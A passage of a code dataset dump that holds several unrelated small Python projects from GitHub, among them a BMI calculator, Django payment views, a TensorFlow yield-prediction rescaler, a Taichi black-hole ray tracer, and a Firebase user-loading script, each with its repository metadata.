Flowers.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"27058325777","text":"\nheightIN = float(input('Please enter your height in Inches: '))\nweightLB = float(input('Please enter your weight in Pounds: '))\n\n\ndef BMI (heightIN, weightLB):\n bmi = weightLB/(heightIN**2) * 703\n\n if bmi >= 19 and bmi <= 24:\n return 'NORMAL', bmi\n\n elif bmi >= 25 and bmi <= 29:\n return 'OVERWEIGHT', bmi\n\n elif bmi >= 30 and bmi <= 39:\n return 'OBESE', bmi\n\n elif bmi > 39:\n return 'MORBIDLY OBESE', bmi\n\n elif bmi < 19:\n return 'UNDERWEIGHT', bmi\n \n\nquote, bmi = BMI(heightIN, weightLB)\nprint('your bmi is: {} and you are: {}' .format(bmi, quote))\n","repo_name":"AliACode/BMI-CALC---PY","sub_path":"BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21544931370","text":"# file: subprocess.py\n# Author: Nikhil Gorantla\n# Data: 14/Jan/2018\n# Description: This python program shows the way to implement the shell commands in the python program using subprocess module\n# Demonstrate piping out of a child process\n# Print names of files bigger than 10000 bytes\n\n\n#!/usr/bin/python3\nfrom subprocess import Popen, PIPE\n\nlister = Popen([\"ls\", \"-l\"], stdout=PIPE)\n\nfor bytes in lister.stdout:\n line = bytes.decode()\n if line.startswith(\"total\"):\n continue\n splitline = line.split()\n # Size is in field 4, name in field 8\n if int(splitline[4]) > 1000:\n print(splitline[8])","repo_name":"nikhilgorantla/pythonPrograming","sub_path":"21.subprocess.py","file_name":"21.subprocess.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33429520838","text":"from typing import List, Union\r\nfrom dataclasses import dataclass\r\nfrom abc import ABCMeta, abstractmethod\r\n\r\nfrom core import utils\r\n\r\n\r\nclass BaseNode(metaclass=ABCMeta):\r\n @abstractmethod\r\n def format(self) -> str:\r\n \"\"\"将该 Node 格式化为字符串\"\"\"\r\n pass\r\n\r\n @abstractmethod\r\n def encode(self) -> bytes:\r\n \"\"\"将该 Node 编码成对应的协议源数据\"\"\"\r\n pass\r\n\r\n @abstractmethod\r\n def from_raw(self, raw_data: bytes):\r\n \"\"\"解析协议源数据并返回对应的 Node 对象\"\"\"\r\n pass\r\n\r\n\r\n@dataclass\r\nclass TextNode(BaseNode):\r\n text: str\r\n\r\n def format(self) -> str:\r\n return self.text\r\n\r\n def encode(self) -> bytes:\r\n stream = utils.Stream()\r\n body = self.text.encode()\r\n\r\n stream.write_byte(0x01)\r\n stream.write_int16(len(body) + 3)\r\n stream.write_byte(0x01)\r\n stream.write_int16(len(body))\r\n stream.write(body)\r\n\r\n return stream.read_all()\r\n\r\n def from_raw(raw_data: bytes):\r\n stream = utils.Stream(raw_data)\r\n text = stream.del_left(1).read_token().decode()\r\n\r\n if len(stream._raw) > 0:\r\n return AtNode.from_raw(raw_data)\r\n\r\n return TextNode(text)\r\n\r\n\r\n@dataclass\r\nclass AtNode(BaseNode):\r\n uin: int\r\n name: str\r\n\r\n def format(self) -> str:\r\n return f\"[PQ:at,qq={self.uin},name={self.name}]\"\r\n\r\n def encode(self) -> bytes:\r\n stream = utils.Stream()\r\n name = \"@\" + self.name\r\n\r\n stream.write_hex(\"00 01 00 00\")\r\n stream.write_int16(len(name))\r\n stream.write_hex(\"00\")\r\n stream.write_int32(self.uin)\r\n stream.write_hex(\"00 00\")\r\n body = stream.read_all()\r\n\r\n name = name.encode()\r\n stream.write_byte(0x01)\r\n stream.write_int16(len(name))\r\n stream.write(name)\r\n stream.write_byte(0x06)\r\n stream.write_int16(len(body))\r\n stream.write(body)\r\n body = stream.read_all()\r\n\r\n stream.write_byte(0x01)\r\n stream.write_int16(len(body))\r\n stream.write(body)\r\n\r\n return stream.read_all()\r\n\r\n def from_raw(raw_data: bytes):\r\n stream = utils.Stream(raw_data)\r\n\r\n stream.del_left(1)\r\n name = stream.read_token().decode()[1:]\r\n\r\n stream.del_left(10)\r\n uin = stream.read_int32()\r\n\r\n return AtNode(uin, name)\r\n\r\n\r\n@dataclass\r\nclass FaceNode(BaseNode):\r\n id: int\r\n\r\n def format(self) -> str:\r\n return f\"[PQ:face,id={self.id}]\"\r\n\r\n def encode(self) -> bytes:\r\n stream = utils.Stream()\r\n\r\n stream.write_byte(0x02)\r\n stream.write_int16(1 + 3)\r\n stream.write_byte(0x01)\r\n stream.write_int16(1)\r\n stream.write_byte(self.id)\r\n\r\n return stream.read_all()\r\n\r\n def from_raw(raw_data: bytes):\r\n stream = utils.Stream(raw_data)\r\n face_id = stream.del_left(3).read_byte()\r\n\r\n return FaceNode(face_id)\r\n\r\n\r\n@dataclass\r\nclass ImageNode(BaseNode):\r\n hash: str\r\n\r\n def format(self) -> str:\r\n return f\"[PQ:image,url=https://gchat.qpic.cn/gchatpic_new/0/0-0-{self.hash}/0?term=3]\"\r\n\r\n def encode(self) -> bytes:\r\n return b''\r\n\r\n def from_raw(raw_data: bytes):\r\n stream = utils.Stream(raw_data)\r\n\r\n stream.del_left(1)\r\n uuid = stream.read_token().decode().strip(\" {}\")\r\n hash = uuid.replace(\"-\", \"\").upper()[:32]\r\n\r\n return ImageNode(hash)\r\n\r\n\r\nMessageNode = Union[TextNode, AtNode, FaceNode, ImageNode]\r\n\r\n\r\nclass Message:\r\n def __init__(self):\r\n self.__nodes: List[MessageNode] = []\r\n\r\n def add(self, node: MessageNode):\r\n if isinstance(node, TextNode):\r\n pass\r\n elif isinstance(node, AtNode):\r\n pass\r\n elif isinstance(node, FaceNode):\r\n pass\r\n elif isinstance(node, ImageNode):\r\n pass\r\n else:\r\n raise ValueError(\"Message 添加的元素不是 MessageNode 包括的类型\")\r\n\r\n self.__nodes.append(node)\r\n return self\r\n\r\n def format(self):\r\n format = \"\"\r\n\r\n for node in self.__nodes:\r\n format += node.format()\r\n return format\r\n \r\n def encode(self):\r\n raw_data = b''\r\n for node in self.__nodes:\r\n raw_data += node.encode()\r\n return raw_data\r\n\r\n def from_raw(raw_data: bytes):\r\n message = Message()\r\n stream = utils.Stream(raw_data)\r\n\r\n while len(stream._raw) > 3:\r\n node_type = stream.read_byte()\r\n node_raw = stream.read_token()\r\n\r\n if node_type == 0x01: # 文本消息\r\n message.add(TextNode.from_raw(node_raw))\r\n elif node_type == 0x02: # 表情消息\r\n message.add(FaceNode.from_raw(node_raw))\r\n elif node_type == 0x03: # 群图片消息\r\n message.add(ImageNode.from_raw(node_raw))\r\n elif node_type == 0x06: # 私聊图片消息\r\n message.add(ImageNode.from_raw(node_raw))\r\n\r\n return message","repo_name":"DawnNights/py-pcqq","sub_path":"core/entities/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"19"} +{"seq_id":"44387980969","text":"from datetime import date, datetime\nfrom django.shortcuts import redirect, render\nfrom psycopg2 import Date\nfrom django.contrib.auth.decorators import login_required\nfrom cobros.forms import registerCuotaForm,ReciboIngresoFormSet\nfrom .models import Cuota\nfrom gestionAsociados.models import ReciboIngreso\n\n# Create your views here.\ndef tableCuotas(request):\n cuotas = Cuota.objects.all()\n #form = registerCuotaForm()\n return render(request, \"createCuota.html\",{\"cuotas\":cuotas})\n\ndef RegistrarCuotas(request):\n tipo = request.POST['tipo']\n monto = request.POST['txtMonto']\n fecha_inicio = request.POST['txtFechaInicio']\n fecha_fin = request.POST['txtFechaFinal']\n cuota = Cuota.objects.create(tipo=tipo, monto=monto, fecha_inicio=fecha_inicio, fecha_fin=fecha_fin)\n return redirect(\"/Cuotas\")\n\n\n\"\"\"def EdicionCuotas(request, id):\n cuota = Cuota.objects.get(id=id)\n datos = {\n 'cuota':cuota\n }\n return render(request, \"editCuota.html\",datos)\n\n\ndef EditarCuotas(request):\n monto = request.POST['txtMonto']\n\n cuota = Cuota.objects.get(id=id)\n cuota.monto = monto\n cuota.save()\n\n return redirect('/Cuotas')\"\"\"\n\n\ndef EliminarCuotas(request, id):\n cuota = Cuota.objects.get(id=id)\n cuota.delete()\n return redirect(\"/Cuotas\")\n\n\ndef listaRecibos(request):\n if verificarRol('cajero',request.user):\n recibos = ReciboIngreso.objects.all()\n if request.method == 'POST':\n filtro = request.POST['filtro']\n print(filtro)\n if filtro == 'all':\n recibosFiltrados = ReciboIngreso.objects.all()\n else:\n recibosFiltrados = ReciboIngreso.objects.filter(cancelado=filtro)\n return render(request,'listaRecibos.html',{\"recibos\":recibosFiltrados})\n elif verificarRol('SOCIO',request.user):\n recibos = ReciboIngreso.objects.filter(aspirante = request.user)\n else:\n return redirect('/home')\n #recibosPendientes = recibos.filter(cancelado = False)\n return render(request,'listaRecibos.html',{\"recibos\":recibos,})\n\n@login_required\ndef cancelarReciboIngreso(request,id):\n recibo = ReciboIngreso.objects.get(id=id)\n recibo.cancelado = True\n recibo.save()\n return redirect('/gestionar_recibos')\n\ndef verificarRol(rolrequerido,user):\n if rolrequerido == user.role or rolrequerido.upper() == user.role:\n return True\n else:\n return False","repo_name":"AlexHernandezSV/Proyecto_G3_TOO115","sub_path":"cobros/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24915181264","text":"import tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport os\n\ndef load_model(sess, model_path, meta_graph):\n saver = tf.train.import_meta_graph(os.path.join(model_path, meta_graph))\n saver.restore(sess, tf.train.latest_checkpoint(os.path.expanduser(model_path)))\n return tf.get_default_graph()\n\ndef get_relevant_nodes_from(graph):\n x = graph.get_tensor_by_name('x:0')\n keep_prob = graph.get_tensor_by_name('Placeholder_2:0')\n logits = graph.get_tensor_by_name('Squeeze:0')\n\n return x, keep_prob, logits\n\ndef predict_with_model(hists, model_path, meta_graph):\n with tf.Session() as sess:\n graph = load_model(sess, model_path, meta_graph)\n x, keep_prob, logits = get_relevant_nodes_from(graph)\n\n feed_dict = {x: hists, keep_prob: 1}\n return sess.run(logits, feed_dict=feed_dict)\n\nVAL_YEAR = 2013\nstates_to_keep = np.array([5, 17, 18, 19, 20, 27, 29, 31, 38, 39, 46])\n\nsoy_data = np.load(os.path.expanduser('~/cs231n-satellite-images-hist/data_soybean_filtered.npz'))\nhist_sums = np.sum(soy_data['output_image'],axis=(1,2,3))\nnonbroken_rows = hist_sums > 287\nimp_rows = pd.DataFrame(soy_data['output_index'])[0].isin(states_to_keep)\nval_year_rows = soy_data['output_year'] == VAL_YEAR\nindex_validate = np.logical_and.reduce((nonbroken_rows, imp_rows, val_year_rows))\n\nsoy_yield = soy_data['output_yield'][index_validate]\n\ncorn_data = np.load(os.path.expanduser('~/cs231n-satellite-images-hist/data_corn.npz'))\ncorn_yield = corn_data['output_yield'][index_validate]\n\n# Scaling Soy Predictions to Corn\ncorn_preds_w_soy_mod = predict_with_model(corn_data['output_image'][index_validate], os.path.expanduser('~/models/run1__dropout_0.50__soybean'), '2013CNN_model.ckpt.meta')\nstd_corn_preds = (corn_preds_w_soy_mod - np.mean(soy_yield))/np.std(soy_yield)\nunstd_corn_preds = std_corn_preds * np.std(corn_yield) + np.mean(corn_yield)\ncorn_rmse = np.sqrt(np.mean((unstd_corn_preds - corn_yield)**2))\nprint(corn_rmse)\n\n# Scaling Corn Predictions to Soy\nsoy_preds_w_corn_mod = predict_with_model(soy_data['output_image'][index_validate], os.path.expanduser('~/models/run2__dropout_0.50__corn'), 'important_counties2013CNN_model.ckpt.meta')\nstd_soy_preds = (soy_preds_w_corn_mod - np.mean(corn_yield))/np.std(corn_yield)\nunstd_soy_preds = std_soy_preds * np.std(soy_yield) + np.mean(soy_yield)\nsoy_rmse = np.sqrt(np.mean((unstd_soy_preds - soy_yield)**2))\nprint(soy_rmse)\n\n# writing out rescaled predictions\nnp.savez(os.path.expanduser('~/cs231n-satellite-images-models/output_rescaling/original_model_rescaled_oututs.npz'), soy_preds=soy_preds_w_corn_mod, corn_preds=corn_preds_w_soy_mod, soy_yield=soy_yield, corn_yield=corn_yield, locs=soy_data['output_index'][index_validate])\n","repo_name":"brad-ross/crop-yield-prediction-project","sub_path":"analysis/output_rescaling/output_rescaling.py","file_name":"output_rescaling.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"19"} +{"seq_id":"32468502108","text":"from taichi_glsl import *\n\nPI = 3.14159265\n\n\n@ti.data_oriented\nclass Ray:\n def __init__(self, origin, direction):\n self.origin = origin\n self.direction = direction\n\n @ti.func\n def update_euler(self):\n color = ti.Vector([0.0, 0.0, 0.0])\n origin = self.origin\n direction = self.direction.normalized()\n x = origin.normalized()\n y = direction.cross(x).normalized()\n z = x.cross(y)\n A_no = ti.Matrix.cols([x, y, z]) # coordinate transformation new -> old\n A_on = A_no.inverse() # coordinate transformation old -> new\n phi = 0.0\n dphi = 0.001\n\n dudphi = -ti.cos(ti.acos(x.dot(direction))) / (ti.sin(ti.acos(x.dot(direction))) * origin.norm())\n accre_l = (A_on @ y.cross(ti.Vector([0, 1, 0]))).normalized()\n accre_phi1 = atan(accre_l[2] / accre_l[0]) % (2 * PI)\n accre_phi2 = (atan(accre_l[2] / accre_l[0]) + PI) % (2 * PI)\n u = 1 / origin.norm()\n\n for i in range(10000):\n phi += dphi\n phi %= 2 * PI\n dudphi += - u * (1 - 3 / 2 * u ** 2) * dphi\n u += dudphi * dphi\n r = 1/u\n if r > 500:\n break\n if r < 0.01:\n break\n if (phi - accre_phi1) * (phi - dphi - accre_phi1) <= 0 or (phi - accre_phi2) * (phi - dphi - accre_phi2) <= 0:\n # add the mapping to the accretion disk\n if 2.5 < r < 5:\n color += ti.Vector([1/(exp((r-4.9)/0.03)+1), 2/(exp((r-5)/0.3)+1)-1, -(r+3)**3*(r-5)/432])\n return color\n\n\n@ti.data_oriented\nclass Camera:\n def __init__(self, fov=60, aspect_ratio=16/9):\n # Camera parameters\n self.lookfrom = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.lookat = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.vup = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.fov = fov\n self.aspect_ratio = aspect_ratio\n\n self.cam_lower_left_corner = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.cam_horizontal = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.cam_vertical = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.cam_origin = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.reset()\n\n @ti.kernel\n def reset(self):\n self.lookfrom[None] = [5.0, 1.0, 0.0]\n self.lookat[None] = [2.0, 0.0, -3.0]\n self.vup[None] = [0.0, 1.0, 0.0]\n theta = self.fov * (PI / 180.0)\n half_height = ti.tan(theta / 2.0)\n half_width = self.aspect_ratio * half_height\n self.cam_origin[None] = self.lookfrom[None]\n w = (self.lookfrom[None] - self.lookat[None]).normalized()\n u = (self.vup[None].cross(w)).normalized()\n v = w.cross(u)\n self.cam_lower_left_corner[None] = ti.Vector([-half_width, -half_height, -1.0])\n self.cam_lower_left_corner[\n None] = self.cam_origin[None] - half_width * u - half_height * v - w\n self.cam_horizontal[None] = 2 * half_width * u\n self.cam_vertical[None] = 2 * half_height * v\n\n @ti.kernel\n def reset_after_move(self):\n self.cam_origin[None] = self.lookfrom[None]\n w = (self.lookfrom[None] - self.lookat[None]).normalized()\n u = (self.vup[None].cross(w)).normalized()\n v = w.cross(u)\n theta = self.fov * (PI / 180.0)\n half_height = ti.tan(theta / 2.0)\n half_width = self.aspect_ratio * half_height\n self.cam_lower_left_corner[None] = ti.Vector([-half_width, -half_height, -1.0])\n self.cam_lower_left_corner[\n None] = self.cam_origin[None] - half_width * u - half_height * v - w\n self.cam_horizontal[None] = 2 * half_width * u\n self.cam_vertical[None] = 2 * half_height * v\n\n def rot_z(self, t):\n self.lookfrom[None][0] = 9.0 * cos(t/100)\n self.lookfrom[None][1] = 9.0 * sin(t/100)\n self.reset_after_move()\n\n @ti.func\n def get_ray(self, u, v):\n return Ray(self.cam_origin[None],\n self.cam_lower_left_corner[None] + u * self.cam_horizontal[None] + v * self.cam_vertical[None] -\n self.cam_origin[None])\n","repo_name":"theAfish/BlackHoleRayMarching","sub_path":"gr_ray_tracing_model.py","file_name":"gr_ray_tracing_model.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"19"} +{"seq_id":"7060860403","text":"from flask import json\nfrom flask_login import current_user\nfrom flask_sse import ServerSentEventsBlueprint, Message\n\nfrom app import app\nfrom models import SSEChannel\n\n\nclass SSE(ServerSentEventsBlueprint):\n def messages(self, channel='sse'):\n \"\"\"\n Generate an infinite stream of messages from the given Redis channel\n\n This method creates a new Redis pubsub connection and stores its\n ID back into the application's database. This is used on client\n disconnect to clean up lingering connections.\n \"\"\"\n redis = self.redis\n SSEChannel.create(user_id=current_user.id, sse_id=redis.client_id())\n pubsub = redis.pubsub()\n pubsub.subscribe(channel)\n for pubsub_message in pubsub.listen():\n if pubsub_message['type'] == 'message':\n msg_dict = json.loads(pubsub_message['data'])\n yield Message(**msg_dict)\n\n\nsse = SSE('sse', __name__)\nsse.add_url_rule(rule=\"\", endpoint=\"stream\", view_func=sse.stream)\napp.register_blueprint(sse, url_prefix=\"/stream\")\n","repo_name":"mattdaviscodes/home-game-poker","sub_path":"sse.py","file_name":"sse.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13431256364","text":"import os\nimport numpy as np\n\nfrom compas.datastructures import Mesh\nfrom compas.datastructures import mesh_explode\n\n# ==============================================================================\n# File\n# ==============================================================================\nHERE = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nfolder_name = 'plate'\nFILE_FOLDER = os.path.join(HERE, 'data', folder_name)\n\n# ==============================================================================\n# Output\n# ==============================================================================\ncounter = 0\nfor i, filename in enumerate(os.listdir(FILE_FOLDER)):\n if filename.endswith(\".obj\"):\n FILE_I = os.path.join(FILE_FOLDER, filename)\n if \"shard\" in filename: \n mesh = Mesh.from_obj(FILE_I)\n\n # explode joined meshes\n exploded_meshes = mesh_explode(mesh)\n print(i, filename)\n for ex_mesh in exploded_meshes:\n FILE_O = os.path.join(FILE_FOLDER, '%s_%s.npy' % (folder_name, counter))\n # delete tiny pieces\n if len(list(ex_mesh.vertices())) < 100:\n continue\n \n vertices = np.array([ex_mesh.vertex_coordinates(vkey) for vkey in ex_mesh.vertices()])\n normals = np.array([ex_mesh.vertex_normal(vkey) for vkey in ex_mesh.vertices()])\n\n datas = np.concatenate((vertices, normals), axis=1)\n print(np.shape(datas))\n np.save(FILE_O, datas)\n\n counter += 1\n\n else:\n os.remove(FILE_I)\n\n elif filename.endswith(\".mtl\"):\n FILE_E = os.path.join(FILE_FOLDER, filename)\n os.remove(FILE_E)\n\n\n\n\n\n","repo_name":"duchaoyu/3d_fracture_reassmbly","sub_path":"data_processing/040_npy_output.py","file_name":"040_npy_output.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34962522082","text":"import product\nimport customer\nimport order\n\n\nif __name__ == '__main__':\n try:\n battery_1 = product.Product('battery ABP7-12L', 776, '12v 7Ah AGM', '156 x 94 x 65')\n battery_2 = product.Product('battery AGM LPM 6V - 12 Ah', 658, '6v 12Ah AGM', '151 x 96 x 50')\n battery_3 = product.Product('battery LP1212', 1798, '12v 12Ah gel', '151 x 98 x 95')\n battery_4 = product.Product('battery GEL 12-12A-BS', 1290, '12v 10Ah gel', '150 x 87 x 106')\n\n customer_1 = customer.Customer('Petrenko', 'Petro', '+380123123123', 'Kyiv')\n order_1 = order.Order('No 0001', customer_1)\n order_1.add_product(battery_1, battery_1.price, quantity=2)\n order_1.add_product(battery_4, battery_4.price)\n order_1.add_product(battery_2, battery_2.price)\n\n except (TypeError, ValueError) as error:\n print(error)\n\n print(order_1, \"\\n\")\n\n try:\n print(f\"{order_1[battery_2][0]} - {order_1[battery_1][1]} pcs\\n\")\n\n for items in order_1:\n product, quantity = (*items,)\n print(f\"{product} - {quantity} pcs\")\n\n print(f\"{order_1[battery_3][0]} - {order_1[battery_1][1]} pcs\")\n\n except KeyError as error:\n print(error)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Geksapod/OOP_Homework_01","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21123147343","text":"\"\"\"\r\nWrite a Python program to sum of three given integers. However, if two values are equal sum will be zero\r\n\"\"\"\r\n\r\ndef sumof(a,b,c):\r\n if(a==b or a==c or b==c):\r\n return 0\r\n else:\r\n return a+b+c\r\n \r\n \r\na,b,c=input(\"enetr 3 numbers with comma seperated:\\n\").split(\",\")\r\n\r\nprint(sumof(int(a),int(b),int(c)))","repo_name":"sanjeevseera/Python-Practice","sub_path":"Basic_Programs/Part2/P033_sum.py","file_name":"P033_sum.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35637526643","text":"#(Version 2 -- Currently Used)\n#File that preloads database with user and session documents from a \"users.csv\" file\n#outputs an added_users.csv file with each user's name and their login username\n\n\n#Needs firebase package to be installed\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport uuid\nimport csv\nimport random\n\n# Use the application default credentials\ncred = credentials.Certificate(\n \"../../../pinmi-59c77-firebase-adminsdk-z692d-955bbf0b26.json\")\nfirebase_admin.initialize_app(cred)\n\n\ndb = firestore.client()\n\n\nudict = {}\n\ninput_file = csv.DictReader(open(\"users.csv\"))\noutput_file = open('added_users.csv', 'w', newline='')\nfieldnames = input_file.fieldnames + ['username']\ncsvwriter = csv.DictWriter(output_file, fieldnames)\ncsvwriter.writeheader()\n\nfor row in input_file:\n # Generate first and last name\n name = row[\"Name\"].split()\n if(len(name) > 1):\n fname = name[0]\n lname = name[1]\n else:\n fname = \"\"\n lname = \"\"\n #get username\n username = row[\"Pin-MI Login Name\"]\n # check if userid already exists (user is already existent)\n userid = \"\"\n doc = db.collection(u'users').document(username).get()\n if(doc.exists):\n userid = doc.to_dict().get('userID')\n print(\"User: \" + username + \" already exists\")\n else:\n userid = uuid.uuid4().hex\n print(\"User: \" + username + \" is new\")\n # assign role\n trole = row[\"Role (Therapist/Client)\"]\n role = \"\"\n if(trole == \"Therapist\"):\n role = \"caller\"\n else:\n role = \"callee\"\n # create dictionary key-obj entry\n udict[username] = {\"first\": fname, \"last\": lname, \"userID\": userid,\n \"username\": username, \"sessionid\": \"\", \"role\": role}\n # printing for confirmation\n user = udict[username]\n print(\"first: \" + user['first'] + \" last: \" + user['last'] +\n \" userid: \" + user['userID'] + \" curSession: \" + user['sessionid'])\ninput_file = csv.DictReader(open(\"users.csv\"))\n\nnumPairs = len(list(input_file)) // 2\n\nfor x in range(1, numPairs):\n # for each pair, create a sessionid (based off of current login format)\n sessionid = uuid.uuid4().hex\n partner1 = str(x) + 'a'\n partner2 = str(x) + 'b'\n udict[partner1][\"sessionid\"] = sessionid\n udict[partner2][\"sessionid\"] = sessionid\n\n if(udict[partner1][\"role\"] == \"caller\"):\n caller = udict[partner1]\n callee = udict[partner2]\n else:\n caller = udict[partner2]\n callee = udict[partner1]\n print(\"caller id: \" + caller[\"userID\"] + \" callee id: \" + callee[\"userID\"])\n # create the session doc\n doc_ref = db.collection(u'sessions').document(sessionid)\n doc_ref.set({\n u'caller_id': caller['userID'],\n u'callee_id': callee['userID'],\n u'media_url': u'default',\n u'duration': u'0',\n })\n\nfor uN in udict:\n user = udict[uN]\n #create user document for each user in udict\n doc_ref = db.collection(u'users').document(user['username'])\n doc_ref.set({\n u'first': user['first'],\n u'last': user['last'],\n u'userID': user['userID'],\n u'curSession': user['sessionid']\n })\n print(user['username'] + \" added\")\n","repo_name":"CoExLab/pinmi","sub_path":"src/other/database/setSessions.py","file_name":"setSessions.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"13698007596","text":"from django.core.files.uploadedfile import InMemoryUploadedFile\ntry:\n from cStringIO import StringIO as BytesIO\nexcept ImportError:\n from io import BytesIO\nfrom django.core.cache import caches\ncache = caches['default']\n\n\nclass FileCache:\n \"\"\"\n Cache file data and retain the file after failed validation\n \"\"\"\n timeout = 1000\n\n def __init__(self):\n self.cache = cache\n\n def set(self, key, upload):\n \"\"\"\n Set file data to cache for 1000s\n :param key: cache key\n :param upload: file data\n \"\"\"\n try:\n state = {\n \"name\": upload.name,\n \"size\": upload.size,\n \"content_type\": upload.content_type,\n \"charset\": upload.charset,\n \"content\": upload.file.read()}\n upload.file.seek(0)\n self.cache.set(key, state, self.timeout)\n except AttributeError:\n pass\n\n def get(self, key):\n \"\"\"\n Get the file data from cache using specific cache key\n :param key: cache key\n :return: File data\n \"\"\"\n upload = None\n state = self.cache.get(key)\n if state:\n f = BytesIO()\n f.write(state[\"content\"])\n upload = InMemoryUploadedFile(\n file=f,\n field_name='file',\n name=state[\"name\"],\n content_type=state[\"content_type\"],\n size=state[\"size\"],\n charset=state[\"charset\"],\n )\n upload.file.seek(0)\n return upload\n\n def delete(self, key):\n \"\"\"\n Delete file data from cache\n :param key: cache key\n \"\"\"\n self.cache.delete(key)\n","repo_name":"MaistrenkoAnton/filefield-cache","sub_path":"filefield_cache/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"16679211337","text":"import json\nimport urllib.parse\nimport arvados\nimport arvados.commands.keepdocker\n\ndef GetServiceInfo():\n return {\n \"id\": \"\",\n \"name\": \"\",\n \"type\": \"\",\n \"description\": \"\",\n \"organization\": {\n },\n \"contactUrl\": \"\",\n \"documentationUrl\": \"\",\n \"createdAt\": \"\",\n \"updatedAt\": \"\",\n \"environment\": \"\",\n \"version\": \"\",\n \"storage\": [],\n \"tesResources_backend_parameters\": []\n }\n\ndef ListTasks():\n return {\"tasks\": []}\n\ndef CreateTask(body):\n print(json.dumps(body, indent=2))\n\n mounts = {}\n\n for inp in body[\"inputs\"]:\n u = urllib.parse.urlparse(inp[\"url\"])\n print(u)\n\n mounts[inp[\"path\"]] = {\n \"kind\": \"collection\",\n \"uuid\": u.netloc,\n \"path\": u.path\n }\n\n # \"url\": \"s3://ce8i5-4zz18-nrm9u73cqjdz4rq/whale.txt\",\n # \"path\": \"/var/lib/cwl/stgb7fd4415-e640-4bc5-9f53-e0e32e8502a3/whale.txt\",\n # \"type\": \"FILE\",\n # \"name\": \"input\",\n # \"description\": \"cwl_input:input\"\n\n mounts[body[\"executors\"][0][\"workdir\"]] = {\n \"kind\": \"tmp\",\n \"capacity\": int(body[\"resources\"][\"disk_gb\"] * 1024*1024*1024)\n }\n\n image_name, image_tag = body[\"executors\"][0][\"image\"].split(\":\")\n\n api = arvados.api()\n\n images = arvados.commands.keepdocker.list_images_in_arv(api, 3,\n image_name=image_name,\n image_tag=image_tag)\n\n container_request = {\n \"state\": \"Committed\",\n \"mounts\": mounts,\n \"runtime_constraints\": {\n \"vcpus\": body[\"resources\"][\"cpu_cores\"],\n \"ram\": int(body[\"resources\"][\"ram_gb\"] * 1024*1024*1024)\n },\n \"container_image\": api.collections().get(uuid=images[0][0]).execute()[\"portable_data_hash\"],\n \"command\": body[\"executors\"][0][\"command\"],\n \"output_path\": body[\"executors\"][0][\"workdir\"],\n \"priority\": 500\n }\n\n print(json.dumps(container_request, indent=2))\n\n cr = api.container_requests().create(body={\"container_request\": container_request}).execute()\n\n return {\"id\": cr[\"uuid\"]}\n\ndef GetTask(id):\n api = arvados.api()\n cr = api.container_requests().get(uuid=id).execute()\n con = api.containers().get(uuid=cr[\"container_uuid\"]).execute()\n\n state = \"\"\n\n if con[\"state\"] == \"Queued\":\n state = \"QUEUED\"\n\n if con[\"state\"] == \"Locked\":\n state = \"INITIALIZING\"\n\n if con[\"state\"] == \"Running\":\n state = \"RUNNING\"\n\n if cr[\"state\"] == \"Final\":\n if con[\"state\"] == \"Complete\":\n state = \"COMPLETE\"\n else:\n state = \"EXECUTOR_ERROR\"\n\n return {\"id\": id, \"state\": state}\n\ndef CancelTask(id):\n print(\"canceling\", id)\n return {\"id\": id}\n","repo_name":"arvados/arvados-tes","sub_path":"arvados_tes/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2122596516","text":"\n# def input_name(name):\n# if name == \"sajjad\":\n# raise Exception(\"sorry this name is not valid for log in !!\") # agar bekhagim dakhel code yek Error exception seda konim\n \n# # input_name('sajjad') \n\n# try:\n# input_name(\"sajjad\")\n# except:\n# print(\"tabe input_name moshekel darad\")\n\n\ntry:\n lname = ansaryan\nexcept NameError:\n print(\"sajjad\")\n \n\n","repo_name":"abolbdh/sajjad_ansaryan","sub_path":"21/02-raise.py","file_name":"02-raise.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} 